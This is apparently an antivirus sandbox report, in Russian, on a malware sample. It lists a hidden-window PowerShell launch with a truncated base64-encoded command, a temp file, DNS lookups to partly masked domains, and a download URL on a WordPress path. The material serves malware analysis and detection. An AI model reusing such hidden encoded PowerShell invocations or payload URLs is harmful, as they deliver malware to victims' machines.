Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAHYAYgBlAHYAZQB1AHkAeAA9ACcATwBrAHkAeAB1AHoAegBhACcAOwAkAEIAaQBlAHYAbwBpAGwAdQBwACAAPQAgACcAMQAyADEAJwA7ACQARgB6AHUAcQBoAHYAZQBmAHQAcgB1AGwAbQA9ACcAUgB1AGQAbQB0AGgAawB6AHUAJwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1424
- %TEMP%\884572.cvr
- 'bb#.##rgmeier.media':80
- http://bb#.##rgmeier.media/wp-includes/runyp-zsv8cv-3508006/
- DNS ASK ab###rique.org
- DNS ASK wl######a.000webhostapp.com
- DNS ASK bl##.##iminavarici.com
- DNS ASK 87##.com
- DNS ASK bb#.##rgmeier.media
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAHYAYgBlAHYAZQB1AHkAeAA9ACcATwBrAHkAeAB1AHoAegBhACcAOwAkAEIAaQBlAHYAbwBpAGwAdQBwACAAPQAgACcAMQAyADEAJwA7ACQARgB6AHUAcQBoAHYAZQBmAHQAcgB1AGwAbQA9ACcAUgB1AGQAbQB0AGgAawB6AHUAJwA... (со скрытым окном)